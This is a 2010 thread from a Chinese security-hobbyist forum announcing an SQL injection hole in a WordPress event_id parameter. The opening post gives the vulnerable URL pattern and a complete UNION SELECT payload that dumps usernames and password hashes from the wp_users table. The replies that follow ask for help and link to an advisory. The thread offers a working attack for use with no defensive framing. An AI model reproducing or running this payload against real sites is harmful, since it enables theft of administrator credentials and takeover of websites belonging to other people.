【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: WordPress最新event_id注入漏洞 [打印本页]

作者: 柔肠寸断 时间: 2010-2-7 10:58 标题: WordPress最新event_id注入漏洞

===[ Exploit ]===

www.WordPress.com/?event_id=[Sql]

www.WordPress.com/Path/?event_id=[Sql]

Exploit:

null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

作者: 海豚 时间: 2010-2-7 14:31

1# 柔肠寸断

师傅能这个漏洞吗

作者: baiyin 时间: 2010-2-8 10:57

http://www.venustech.com.cn/NewsInfo/124/5957.Html

作者: hyrz 时间: 2010-2-14 13:21

这样的站点都能注入，汗！

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)